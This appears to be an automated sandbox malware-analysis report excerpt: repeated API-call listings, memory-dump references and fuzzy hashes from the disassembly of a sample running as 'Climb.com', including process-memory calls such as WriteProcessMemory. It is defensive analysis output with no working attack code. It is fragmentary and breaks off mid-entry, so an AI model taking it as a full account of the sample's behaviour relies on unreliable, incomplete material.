                                                                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00551982
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00551991
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00551998
                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005519AE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                      • Opcode ID: 05605559239f5d0fdeaa26efd192e6bc88df597a3ad22d7e7962212eb157cbbd
                                                                                                                                                                      • Instruction ID: 6d908027ae8b8fd8571b9d20ab0a229e4cfd01945ff9cc9de801832af0d1cac2
                                                                                                                                                                      • Opcode Fuzzy Hash: 05605559239f5d0fdeaa26efd192e6bc88df597a3ad22d7e7962212eb157cbbd
                                                                                                                                                                      • Instruction Fuzzy Hash: D5F03775200701ABDB214FA9EC6DF963FBDEF896A1F100415FE45AB2A0DA71E804DB70
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00551916
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00551922
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00551931
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00551938
                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0055194E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                      • Opcode ID: 0e134db9f22dbae1a7823c51393c15190b039ab86ac24a6390230f5997cd5c66
                                                                                                                                                                      • Instruction ID: 631296b7f34bd6f3e9a3487a5484412448e2ebbe618fbf80cc6f347002bdb3fa
                                                                                                                                                                      • Opcode Fuzzy Hash: 0e134db9f22dbae1a7823c51393c15190b039ab86ac24a6390230f5997cd5c66
                                                                                                                                                                      • Instruction Fuzzy Hash: 17F03775200702ABDB210FA9AC5DF563FB9EF897A1F110415FE45AB2A0DA71D804DB70
                                                                                                                                                                      APIs
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00560B24,?,00563D41,?,00000001,00533AF4,?), ref: 00560CCB
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00560B24,?,00563D41,?,00000001,00533AF4,?), ref: 00560CD8
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00560B24,?,00563D41,?,00000001,00533AF4,?), ref: 00560CE5
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00560B24,?,00563D41,?,00000001,00533AF4,?), ref: 00560CF2
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00560B24,?,00563D41,?,00000001,00533AF4,?), ref: 00560CFF
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00560B24,?,00563D41,?,00000001,00533AF4,?), ref: 00560D0C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: cec8e753283a762db3d18f1de05883a7cf85208c3b173a8dc5f814af9ca0c98e
                                                                                                                                                                      • Instruction ID: 7c6e2c7c1b279a33d5cab7903e931d24d366e989db126a6d72e3ebb9013b288f
                                                                                                                                                                      • Opcode Fuzzy Hash: cec8e753283a762db3d18f1de05883a7cf85208c3b173a8dc5f814af9ca0c98e
                                                                                                                                                                      • Instruction Fuzzy Hash: BD01DC71800B058FCB30AFA6D880813FBF9BE602153109A3ED092529A1C7B0A849DF80
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 005565BF
                                                                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 005565D6
                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 005565EE
                                                                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 0055660A
                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00556624
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3741023627-0
                                                                                                                                                                      • Opcode ID: 077bb063a824fcaf593814b06f6b9e1c755f153f31a4b4ad488ea7c3eddfc954
                                                                                                                                                                      • Instruction ID: cf9b5994044e46b85a604ea8784a8f73f80cb5bfaec3f35b44ee5dcab519534f
                                                                                                                                                                      • Opcode Fuzzy Hash: 077bb063a824fcaf593814b06f6b9e1c755f153f31a4b4ad488ea7c3eddfc954
                                                                                                                                                                      • Instruction Fuzzy Hash: 9C018B70500308ABEF205F51DD5EF967BB8FF10706F40155AA947720D1EBF4694C9B54
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 0052DAD2
                                                                                                                                                                        • Part of subcall function 00522D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0052DB51,005C1DC4,00000000,005C1DC4,00000000,?,0052DB78,005C1DC4,00000007,005C1DC4,?,0052DF75,005C1DC4), ref: 00522D4E
                                                                                                                                                                        • Part of subcall function 00522D38: GetLastError.KERNEL32(005C1DC4,?,0052DB51,005C1DC4,00000000,005C1DC4,00000000,?,0052DB78,005C1DC4,00000007,005C1DC4,?,0052DF75,005C1DC4,005C1DC4), ref: 00522D60
                                                                                                                                                                      • _free.LIBCMT ref: 0052DAE4
                                                                                                                                                                      • _free.LIBCMT ref: 0052DAF6
                                                                                                                                                                      • _free.LIBCMT ref: 0052DB08
                                                                                                                                                                      • _free.LIBCMT ref: 0052DB1A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: ea1d22e15c4c0b9ca16089d7dc4a771a62c3950dc1a396debec98af7e3dafbd3
                                                                                                                                                                      • Instruction ID: 0ee302317dc30ab523086f2ecb6d8e6f49e80298d61abbc0d87d6266ed23e38e
                                                                                                                                                                      • Opcode Fuzzy Hash: ea1d22e15c4c0b9ca16089d7dc4a771a62c3950dc1a396debec98af7e3dafbd3
                                                                                                                                                                      • Instruction Fuzzy Hash: D4F01232544625BB8668EB58F989C1A7BFDFE567117A50C05F009D7581DB30FC808E74
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 0052262E
                                                                                                                                                                        • Part of subcall function 00522D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0052DB51,005C1DC4,00000000,005C1DC4,00000000,?,0052DB78,005C1DC4,00000007,005C1DC4,?,0052DF75,005C1DC4), ref: 00522D4E
                                                                                                                                                                        • Part of subcall function 00522D38: GetLastError.KERNEL32(005C1DC4,?,0052DB51,005C1DC4,00000000,005C1DC4,00000000,?,0052DB78,005C1DC4,00000007,005C1DC4,?,0052DF75,005C1DC4,005C1DC4), ref: 00522D60
                                                                                                                                                                      • _free.LIBCMT ref: 00522640
                                                                                                                                                                      • _free.LIBCMT ref: 00522653
                                                                                                                                                                      • _free.LIBCMT ref: 00522664
                                                                                                                                                                      • _free.LIBCMT ref: 00522675
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: d039abe0e0324d10112efec5ef00065f3b882e7aee134bfc187d918e76582b2e
                                                                                                                                                                      • Instruction ID: 25b6f84a96bfaf208217b4df5a9c08bec38e68a462acda5c264b8186f04eabea
                                                                                                                                                                      • Opcode Fuzzy Hash: d039abe0e0324d10112efec5ef00065f3b882e7aee134bfc187d918e76582b2e
                                                                                                                                                                      • Instruction Fuzzy Hash: 7FF03A79841A31AF8706AF54FC05C483FA4FF36752B440A1AF410922B5DB35190ABFA8
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __freea$_free
                                                                                                                                                                      • String ID: a/p$am/pm
                                                                                                                                                                      • API String ID: 3432400110-3206640213
                                                                                                                                                                      • Opcode ID: ba3554badf9cc07d4ccb92e92e22a5eaca40bc48c229c7bbe6b144e84b1164d2
                                                                                                                                                                      • Instruction ID: fcf899c3c48f2800f70f82a805c9ad85af33a3397da79105065816a105b83b35
                                                                                                                                                                      • Opcode Fuzzy Hash: ba3554badf9cc07d4ccb92e92e22a5eaca40bc48c229c7bbe6b144e84b1164d2
                                                                                                                                                                      • Instruction Fuzzy Hash: 4FD10571A00A269ACB249F68E8557BFBFB1FF77300F28055AE5069B6D0D3359D40CB98
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 005641FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,005752EE,?,?,00000035,?), ref: 00564229
                                                                                                                                                                        • Part of subcall function 005641FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,005752EE,?,?,00000035,?), ref: 00564239
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00575419
                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0057550E
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 005755CD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                                                                                                                      • String ID: bnU
                                                                                                                                                                      • API String ID: 2854431205-1416439054
                                                                                                                                                                      • Opcode ID: 2e8583ffb1674525836248840db77c7488594616827d98139afe114eb0e30c69
                                                                                                                                                                      • Instruction ID: a56be93d6bd043a2e1ef31644fb0e5df68bd3382933dd062dea463904c756438
                                                                                                                                                                      • Opcode Fuzzy Hash: 2e8583ffb1674525836248840db77c7488594616827d98139afe114eb0e30c69
                                                                                                                                                                      • Instruction Fuzzy Hash: A7D16D7090024D9FDB04DF95C495EEDBBB5FF48304F54841EE50AAB2A2EB71A98ACF50
                                                                                                                                                                      APIs
                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 004FD253
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                      • String ID: t5\$t5\$t5\
                                                                                                                                                                      • API String ID: 1385522511-1338728527
                                                                                                                                                                      • Opcode ID: 340a1e4ab9d7e9e5a22544fd1c2cf4a2cd83f3ca25e6824cf8709a910182d564
                                                                                                                                                                      • Instruction ID: 56747ac7f6e64b84bbff272ecb84f2ded3d92c37f1a5f39524f93a9384a49274
                                                                                                                                                                      • Opcode Fuzzy Hash: 340a1e4ab9d7e9e5a22544fd1c2cf4a2cd83f3ca25e6824cf8709a910182d564
                                                                                                                                                                      • Instruction Fuzzy Hash: 83913A75E0020ADFCB14CF98C590ABABBF2FF59314F24815ADA4597340D739EA82DB94
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffCharUpper_wcslen
                                                                                                                                                                      • String ID: CALLARGARRAY$bnU
                                                                                                                                                                      • API String ID: 157775604-1021300608
                                                                                                                                                                      • Opcode ID: 1d531a13201180d803fa2ff7a551c320c3a835d6e2b148bb63a0a8f408e1302a
                                                                                                                                                                      • Instruction ID: 123ec5f213ed99371cbe1d3d0e3a679d1c901169c582cd544aabe3cf516630f6
                                                                                                                                                                      • Opcode Fuzzy Hash: 1d531a13201180d803fa2ff7a551c320c3a835d6e2b148bb63a0a8f408e1302a
                                                                                                                                                                      • Instruction Fuzzy Hash: BC41DF35A006199FCB00DFA5D8858FEBFB5FF58324B108029E509A7292E7709D81CB90
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0055BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00552B1D,?,?,00000034,00000800,?,00000034), ref: 0055BDF4
                                                                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 005530AD
                                                                                                                                                                        • Part of subcall function 0055BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00552B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0055BDBF
                                                                                                                                                                        • Part of subcall function 0055BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0055BD1C
                                                                                                                                                                        • Part of subcall function 0055BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00552AE1,00000034,?,?,00001004,00000000,00000000), ref: 0055BD2C
                                                                                                                                                                        • Part of subcall function 0055BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00552AE1,00000034,?,?,00001004,00000000,00000000), ref: 0055BD42
                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0055311A
                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00553167
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                      • String ID: @
                                                                                                                                                                      • API String ID: 4150878124-2766056989
                                                                                                                                                                      • Opcode ID: 3a4a55e95fcf402703a0e5939100da028d9c673a7a176542cc9892679f2c6935
                                                                                                                                                                      • Instruction ID: 7170b1ca044a1a5e2b736d308337a935bf21f733874108c1beedfca8c714c9e8
                                                                                                                                                                      • Opcode Fuzzy Hash: 3a4a55e95fcf402703a0e5939100da028d9c673a7a176542cc9892679f2c6935
                                                                                                                                                                      • Instruction Fuzzy Hash: 09411B72900219AFDB10DBA4CD95BEEBBB8FF45741F104096FA45B7181DA706F89CB60
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\768400\Climb.com,00000104), ref: 00521AD9
                                                                                                                                                                      • _free.LIBCMT ref: 00521BA4
                                                                                                                                                                      • _free.LIBCMT ref: 00521BAE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                      • API String ID: 2506810119-1800092792
                                                                                                                                                                      • Opcode ID: 3a36d03f15e21ab6570531bf475583168a5d0c01059465455b5009b8a2c62ff4
                                                                                                                                                                      • Instruction ID: f158fd6fb34dc1d9ddb5c466e6c09caa39941c3245da94fa94396636edc21b5a
                                                                                                                                                                      • Opcode Fuzzy Hash: 3a36d03f15e21ab6570531bf475583168a5d0c01059465455b5009b8a2c62ff4
                                                                                                                                                                      • Instruction Fuzzy Hash: A0319575A00629AFCB11DF99E884D9FBFFCFF96310F104066E80497251E6704E40DB94
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0055CBB1
                                                                                                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 0055CBF7
                                                                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005C29C0,018BFB88), ref: 0055CC40
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 135850232-4108050209
                                                                                                                                                                      • Opcode ID: 3d121840281bfe21358272446bac0d07c3c8ea5d47a79654446449a8f1c03ee9
                                                                                                                                                                      • Instruction ID: 9eafbcf01fd06d59521c1cb8f878a0d1995d1aee64f4e0d2138eef19c7ea2f89
                                                                                                                                                                      • Opcode Fuzzy Hash: 3d121840281bfe21358272446bac0d07c3c8ea5d47a79654446449a8f1c03ee9
                                                                                                                                                                      • Instruction Fuzzy Hash: 4441C3712043029FD710DF24D895B1ABFE4FF84725F04461EF9A5972D1C734A948CB62
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0058DCD0,00000000,?,?,?,?), ref: 00584F48
                                                                                                                                                                      • GetWindowLongW.USER32 ref: 00584F65
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00584F75
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
